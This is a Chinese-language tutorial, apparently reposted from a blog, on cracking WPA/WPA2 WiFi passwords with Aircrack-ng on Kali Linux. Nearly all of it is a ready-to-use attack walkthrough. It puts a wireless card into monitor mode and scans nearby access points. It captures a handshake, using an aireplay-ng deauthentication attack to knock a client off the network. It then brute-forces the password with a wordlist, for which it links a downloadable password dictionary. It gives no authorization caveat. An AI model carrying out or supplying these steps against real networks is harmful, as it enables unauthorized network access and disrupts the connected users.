Kali系統(tǒng)使用Aircrack-ng進(jìn)行暴力破解WIFI密碼

• 一、什么是Aircrack-ng
• • 運(yùn)行環(huán)境
  • 插入網(wǎng)卡設(shè)備
• 二、破解流程
• • 1.進(jìn)入管理員模式
  • 2.查看網(wǎng)卡信息
  • 3.殺掉沖突進(jìn)程
  • 4.查看網(wǎng)卡是否支持監(jiān)聽模式
  • 5.開啟無線網(wǎng)卡監(jiān)聽模式
  • 5.獲取附近的AP信息（搜WIFI）
  • 6.開始抓取握手包并保存成文件
  • • (1) 等待新的設(shè)備連接WIFI
    • (2) 主動攻擊
  • 6. 破解握手包密碼
  • 7.關(guān)閉監(jiān)聽模式
• 三、總結(jié)
• • 1.問題
  • 2.密碼字典

一、什么是Aircrack-ng

Aircrack-ng是一個與802.11標(biāo)準(zhǔn)的無線網(wǎng)絡(luò)分析有關(guān)的安全軟件，主要功能有：網(wǎng)絡(luò)偵測，數(shù)據(jù)包嗅探，WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持監(jiān)聽模式的無線網(wǎng)卡上（設(shè)備列表請參閱其官方網(wǎng)站）并嗅探802.11a，802.11b，802.11g的數(shù)據(jù)。該程序可運(yùn)行在Linux和Windows上。Linux版本已經(jīng)被移植到了Zaurus和Maemo系統(tǒng)平臺, 并概念驗(yàn)證可移植到iPhone。

運(yùn)行環(huán)境

使用Kali 2021.3進(jìn)行演示操作
軟件：aircrack-ng（Kali系統(tǒng)內(nèi)置）
外置無線網(wǎng)卡設(shè)備： 要支持監(jiān)聽，支持Linux并且免驅(qū)（我這里使用的是RT3070）

插入網(wǎng)卡設(shè)備

進(jìn)入Kali系統(tǒng)之后插入自己的網(wǎng)卡

右鍵查看網(wǎng)卡是否連接到Kali

二、破解流程

1.進(jìn)入管理員模式

命令： sudo su
解釋： 不在管理員模式下運(yùn)行可能會有權(quán)限不夠的提示

提示：執(zhí)行命令之后輸入Kali的密碼，密碼是被隱藏的，直接輸入然后回車即可

2.查看網(wǎng)卡信息

命令： iwconfig/ifconfig
解釋： iwconfig查看網(wǎng)卡的信息、ifconfig查看新連接的設(shè)備
wlan0就是我們的無線網(wǎng)卡

3.殺掉沖突進(jìn)程

命令： airmon-ng check kill
解釋： 殺死進(jìn)程可以讓搜索更準(zhǔn)確，不會受到影響

4.查看網(wǎng)卡是否支持監(jiān)聽模式

命令： airmon-ng
出現(xiàn)你的網(wǎng)卡信息就說明你的網(wǎng)卡支持監(jiān)聽

5.開啟無線網(wǎng)卡監(jiān)聽模式

命令： airmon-ng start wlan0
解釋： start開啟哪個接口 wlan0是接口的名字

再用iwconfig查看一下網(wǎng)卡信息，wlan0后面多了個mon，wlan0mon就說明已經(jīng)開啟監(jiān)聽了

5.獲取附近的AP信息（搜WIFI）

命令： airodump-ng wlan0mon
解釋： BSSID：WIFI的MAC地址、PWR：信號強(qiáng)度（值越小信號強(qiáng)度強(qiáng)）、Data：監(jiān)聽期間流量總合、CH：信道、ENC：加密算法、ESSID：WIFI名稱

提示：找到網(wǎng)絡(luò)之后CTRL+Z結(jié)束搜索就可以

6.開始抓取握手包并保存成文件

命令： airodump-ng -c (頻道號) --bssid (MAC地址) -w (抓取的數(shù)據(jù)包的保存位置) wlan0mon
解釋：

c:信道bssid:BSSID值w:捕獲的握手包要保存到的路徑

我要破解的目標(biāo)網(wǎng)絡(luò)是Test，CH（信道）是11，MAC地址是E2:D4:64:02:73:A8，我在根目錄下創(chuàng)建了一個名為1的文件夾
輸入命令： airodump-ng -c 11 --bssid E2:D4:64:02:73:A8 -w 1/ wlan0mon

提示：所有的數(shù)值都要寫剛剛查到要破解的WIFI其中一個客戶端的值

(1) 等待新的設(shè)備連接WIFI

當(dāng)新的客戶端連接時，客戶端輸入密碼連接就可以抓到握手包，右上角出現(xiàn)WPA時就表示已經(jīng)抓到了對方的握手包

(2) 主動攻擊

命令： aireplay-ng -o 2 -a BSSID（MAC地址） -c STATION wlan0mon
解釋：

0 ：對客戶端表示發(fā)起攻擊，讓設(shè)備斷開連接2：表示攻擊次數(shù)，0表示一直攻擊a ：指定無線路由器BSSIDc ：指定強(qiáng)制斷開的設(shè)備MAC

執(zhí)行命令aireplay-ng -o 2 -a E2:D4:64:02:73:A8 -c C8:94:02:6D:93:F3 wlan0mon
捕捉到握手包時就停止攻擊

注意：執(zhí)行主動攻擊的時候新建一個終端執(zhí)行命令，原來的抓包終端不要結(jié)束

6. 破解握手包密碼

命令： aircrack-ng -a2 -b E2:D4:64:02:73:A8 -w 字典.txt 1/-01.cap
解釋：

a2:WPA的握手包b :破解的WIFI的BSSIDw :指定字典文件* :.cap是抓取到握手包的數(shù)據(jù)包文件

最后就是等待跑字典了，下面就是破解的WIFI密碼，密碼是20041101

7.關(guān)閉監(jiān)聽模式

命令： airmon-ng stop wlan0mon
在監(jiān)聽模式下，kali不能連接網(wǎng)絡(luò)

三、總結(jié)

1.問題

插入網(wǎng)卡，如果查看不到網(wǎng)卡信息，可以點(diǎn)開連接WIFI看一下能否搜索到附近的網(wǎng)絡(luò)，如果不行那就右鍵系統(tǒng)可移動設(shè)備-把網(wǎng)卡斷開再重新連接一下

2.密碼字典

插入網(wǎng)卡，打開網(wǎng)卡的監(jiān)聽模式，搜索附近的WIFI，獲取握手包，最后跑字典破解握手包，這里給大家提供一個常用的密碼字典

鏈接: https://pan.baidu.com/s/1NSNniAvaLdcY0HALbBnUTw?pwd=gg7y
提取碼: gg7y

總結(jié)

以上是生活随笔為你收集整理的Kali使用Aircrack-ng进行暴力破解WIFI密码的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。